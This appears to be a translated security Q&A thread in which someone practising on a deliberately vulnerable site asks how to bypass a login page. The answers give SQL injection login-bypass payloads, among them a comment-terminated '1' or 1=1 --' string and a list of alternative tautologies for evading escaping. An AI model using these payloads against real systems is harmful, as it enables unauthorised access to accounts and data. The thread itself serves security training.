Pasar por alto la página de inicio de sesión con la inyección de SQL [cerrado]

-1

Estoy usando una página web vulnerable para practicar los ataques OWASP. En el escenario actual, tengo una página de inicio de sesión que estoy intentando omitir. He intentado Burp suite y hojas de trucos manuales pero no pude evitarlo a pesar de que es vulnerable. Adjunto una captura de pantalla de la página de inicio de sesión.

¿Cómo omito el inicio de sesión?

    
pregunta zubair malik 22.10.2017 - 22:11
fuente

2 respuestas

1

Comprueba mi respuesta aquí .

Desde la declaración de SQL mostrada en la imagen de arriba "y" tiene prioridad en "o" , por lo que si el valor de la contraseña no existe en la base de datos, La declaración no devolverá nada.

Lo que puedo sugerir es inyectar un símbolo de comentario en el campo de nombre de usuario como este:

 1' or 1 = 1  --
    
respondido por el elsadek 22.10.2017 - 22:51
fuente
1

en la imagen de arriba, toda la cadena se escapó. Intenta la codificación y la codificación doble

  

Expresión alternativa de 'o 1 = 1'

OR 'SQLi' = 'SQL'+'i'
OR 'SQLi' > 'S'
or 20 > 1
OR 2 between 3 and 1
OR 'SQLi' = N'SQLi'
1 and 1 = 1
1 || 1 = 1
1 && 1 = 1

Puede leer más aquí hoja de prueba de inyección OWASP sql

también, practica en una aplicación conocida como WebGoat, ya que tiene sugerencias y la solución, y te lo explica

    
respondido por el mrashid 23.10.2017 - 12:08
fuente

Lea otras preguntas en las etiquetas